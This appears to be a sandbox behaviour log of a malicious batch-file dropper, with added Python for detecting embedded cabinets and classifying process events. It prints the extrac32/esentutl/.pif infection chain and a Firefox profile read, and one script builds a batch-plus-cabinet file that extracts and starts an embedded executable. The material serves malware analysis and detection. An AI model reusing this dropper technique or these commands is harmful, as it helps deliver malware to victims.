Source: C:\Users\Public\Libraries\xrbjyllC.pif Command line argument: 08A 9_1_00413780
Source: C:\Users\Public\Libraries\xrbjyllC.pif Command line argument: 08A 11_2_00413780
Source: C:\Users\Public\Libraries\xrbjyllC.pif Command line argument: 08A 11_2_00413780
Source: C:\Users\Public\Libraries\xrbjyllC.pif Command line argument: 08A 11_1_00413780
Source: C:\Users\user\AppData\Local\Temp\x.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\xrbjyllC.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\System32\extrac32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
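The report shows extrac32 being pointed at the .bat itself and writing x.exe, so the batch file doubles as a Microsoft Cabinet archive: the batch text in front does not stop extrac32 from finding the MSCF header. The triage script below is an added example, not part of the Joe Sandbox report or the sample; it scans any file for embedded cabinets and lists member names, sizes and compression from the CFHEADER/CFFOLDER/CFFILE tables without extracting anything. The batch text and the one-file cabinet it builds are constructed test input modelled on the report's extrac32 command line, not bytes from the real sample.

```python
"""Find MSCF cabinets embedded in a file (e.g. a .bat) and list what
extrac32 would drop. Added example; the sample polyglot is constructed."""
import struct

CAB_SIGNATURE = b"MSCF"
CFHDR_FMT = "<4sIIIIIBBHHHHH"           # CFHEADER: 36 bytes
CFHDR_SIZE = struct.calcsize(CFHDR_FMT)
CFFOLDER_FMT = "<IHH"                     # coffCabStart, cCFData, typeCompress
CFFILE_FMT = "<IIHHHH"                    # cbFile, uoffFolderStart, iFolder, date, time, attribs
FLAG_RESERVE_PRESENT = 0x0004
COMPRESSION = {0: "NONE", 1: "MSZIP", 2: "QUANTUM", 3: "LZX"}


def _parse_cab_at(data, off):
    """Parse the cabinet starting at data[off:]; None if it is not a sane CFHEADER."""
    if len(data) - off < CFHDR_SIZE:
        return None
    (sig, _r1, cb_cabinet, _r2, coff_files, _r3, ver_minor, ver_major,
     c_folders, c_files, flags, set_id, _i_cabinet) = struct.unpack_from(CFHDR_FMT, data, off)
    # Plausibility checks: format 1.3, cabinet fits in the file, file table inside it
    if sig != CAB_SIGNATURE or (ver_major, ver_minor) != (1, 3):
        return None
    if cb_cabinet < CFHDR_SIZE or off + cb_cabinet > len(data):
        return None
    if not (CFHDR_SIZE <= coff_files < cb_cabinet):
        return None
    pos = off + CFHDR_SIZE
    cb_cffolder = 0
    if flags & FLAG_RESERVE_PRESENT:            # optional per-header reserve area
        cb_cfheader, cb_cffolder, _cb_cfdata = struct.unpack_from("<HBB", data, pos)
        pos += 4 + cb_cfheader
    folders = []
    for _ in range(c_folders):
        _coff, _n_cfdata, type_compress = struct.unpack_from(CFFOLDER_FMT, data, pos)
        folders.append(COMPRESSION.get(type_compress & 0x000F, "UNKNOWN"))
        pos += struct.calcsize(CFFOLDER_FMT) + cb_cffolder
    files = []
    pos = off + coff_files
    for _ in range(c_files):
        cb_file, _uoff, i_folder, _d, _t, _attr = struct.unpack_from(CFFILE_FMT, data, pos)
        pos += struct.calcsize(CFFILE_FMT)
        end = data.index(b"\x00", pos)          # szName is NUL-terminated
        name = data[pos:end].decode("latin-1")
        pos = end + 1
        comp = folders[i_folder] if i_folder < len(folders) else "?"
        files.append((name, cb_file, comp))
    return {"offset": off, "size": cb_cabinet, "set_id": set_id, "files": files}


def find_embedded_cabs(data):
    """Scan for every MSCF signature and keep those that parse as a cabinet."""
    found, start = [], 0
    while True:
        off = data.find(CAB_SIGNATURE, start)
        if off < 0:
            return found
        cab = _parse_cab_at(data, off)
        if cab:
            found.append(cab)
            start = off + cab["size"]
        else:
            start = off + 1


def build_sample_polyglot(payload=b"MZ" + b"\x90" * 62):
    """Constructed test input (not the real sample): batch text followed by a
    stored (uncompressed) one-file cabinet whose member is named x.exe."""
    batch = (b"@echo off\r\n"
             b'extrac32 /y "%~f0" "%TEMP%\\x.exe"\r\n'
             b'start "" "%TEMP%\\x.exe"\r\n')
    name = b"x.exe\x00"
    cffile = struct.pack(CFFILE_FMT, len(payload), 0, 0, 0, 0, 0x20) + name
    coff_files = CFHDR_SIZE + struct.calcsize(CFFOLDER_FMT)
    coff_data = coff_files + len(cffile)
    cffolder = struct.pack(CFFOLDER_FMT, coff_data, 1, 0)   # typeCompress 0 = NONE
    cfdata = struct.pack("<IHH", 0, len(payload), len(payload)) + payload
    cb_cabinet = coff_data + len(cfdata)
    header = struct.pack(CFHDR_FMT, CAB_SIGNATURE, 0, cb_cabinet, 0, coff_files, 0,
                         3, 1, 1, 1, 0, 0x1234, 0)
    return batch + header + cffolder + cffile + cfdata


if __name__ == "__main__":
    sample = build_sample_polyglot()
    for cab in find_embedded_cabs(sample):
        print(f"cabinet at offset {cab['offset']} ({cab['size']} bytes):")
        for name, size, comp in cab["files"]:
            print(f"  {name}  {size} bytes  {comp}")
```

Run it against a suspicious .bat by reading the file in binary mode and passing the bytes to find_embedded_cabs; a batch file that lists a .exe member is exactly the extrac32 /y "<bat>" "<exe>" pattern the report records.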
Source: z1Transaction_ID_REF2418_cmd.bat ReversingLabs: Detection: 23%
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\z1Transaction_ID_REF2418_cmd.bat" "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\xrbjyllC.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Cllyjbrx.PIF /o
Source: C:\Windows\SysWOW64\esentutl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif
Source: unknown Process created: C:\Users\Public\Libraries\Cllyjbrx.PIF "C:\Users\Public\Libraries\Cllyjbrx.PIF"
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Process created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif
Source: unknown Process created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
Source: unknown Process created: C:\Users\Public\Libraries\Cllyjbrx.PIF "C:\Users\Public\Libraries\Cllyjbrx.PIF"
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Process created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif
Source: unknown Process created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\z1Transaction_ID_REF2418_cmd.bat" "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\xrbjyllC.cmd" " Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Cllyjbrx.PIF /o Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Process created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Process created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif
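The process tree above is the whole delivery chain: cmd.exe runs the .bat, extrac32 extracts x.exe from it, x.exe drops xrbjyllC.cmd under C:\Users\Public\Libraries, esentutl /y <src> /d <dst> /o copies cmd.exe to alpha.pif and x.exe to Cllyjbrx.PIF, and the .pif copies then run from C:\Users\Public. The detection logic below is an added example, not the sandbox's own signatures; it classifies process-creation events against those four patterns. The event list is constructed from the command lines in the report plus one benign extrac32 call as a control, and the rule names are the example's own.

```python
"""Classify process-creation events for the extrac32 / esentutl / .pif chain
seen in the report. Added example; events are constructed from the report."""
import re


def _norm(s):
    # The report shows esentutl paths with doubled backslashes; fold them and lowercase
    return s.replace("\\\\", "\\").lower()


def _argv(cmdline):
    """Split a command line into tokens, honouring double quotes."""
    return [a or b for a, b in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def _after(args, switch):
    """Value following a switch such as /y or /d, or '' if absent."""
    i = args.index(switch) + 1
    return args[i] if i < len(args) else ""


def classify(image, cmdline):
    """Return the rule names the event triggers (empty list = nothing suspicious)."""
    hits = []
    image_n, args = _norm(image), _argv(_norm(cmdline))

    if image_n.endswith("\\extrac32.exe"):
        # extrac32 [switches] <cabinet> <destination>: cabinet is the first non-switch operand
        operands = [a for a in args[1:] if not a.startswith("/")]
        if operands and not operands[0].endswith(".cab"):
            hits.append("extrac32_non_cab_source")

    if image_n.endswith("\\esentutl.exe") and {"/y", "/d", "/o"} <= set(args):
        # /y <source> /d <destination> /o is esentutl's file-copy mode
        src, dst = _after(args, "/y"), _after(args, "/d")
        hits.append("esentutl_copy_mode")
        if src.endswith("\\cmd.exe") and not dst.endswith("cmd.exe"):
            hits.append("cmd_exe_cloned_under_new_name")
        if dst.endswith(".pif"):
            hits.append("esentutl_writes_pif")

    if image_n.startswith("c:\\users\\public\\") and image_n.endswith(".pif"):
        hits.append("pif_executed_from_public")

    return hits


# Constructed events: (image, command line), copied from the report's process tree,
# plus a benign extrac32 call at the end as a negative control
EVENTS = [
    (r"C:\Windows\System32\extrac32.exe",
     r'extrac32 /y "C:\Users\user\Desktop\z1Transaction_ID_REF2418_cmd.bat" '
     r'"C:\Users\user\AppData\Local\Temp\x.exe"'),
    (r"C:\Windows\SysWOW64\esentutl.exe",
     r"C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o"),
    (r"C:\Windows\SysWOW64\esentutl.exe",
     r"C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe "
     r"/d C:\\Users\\Public\\Libraries\\Cllyjbrx.PIF /o"),
    (r"C:\Users\Public\Libraries\xrbjyllC.pif", r"C:\Users\Public\Libraries\xrbjyllC.pif"),
    (r"C:\Windows\System32\extrac32.exe", r'extrac32 /y "C:\patch\update.cab" "C:\patch"'),
]


def triage(events):
    """Return [(image basename, hits)] for every event that triggered a rule."""
    out = []
    for image, cmdline in events:
        hits = classify(image, cmdline)
        if hits:
            out.append((image.rsplit("\\", 1)[-1], hits))
    return out


if __name__ == "__main__":
    for name, hits in triage(EVENTS):
        print(f"{name}: {', '.join(hits)}")
```

Fed Sysmon Event ID 1 or 4688 records, classify marks every stage of the chain while leaving the ordinary cabinet extraction alone; the esentutl rule keys on the /y /d /o switch set rather than the binary name, so it still fires when the binary has been renamed.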
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: url.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior (this entry appears 220 more times consecutively in the report, with the module name shown only as ??.dll)
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
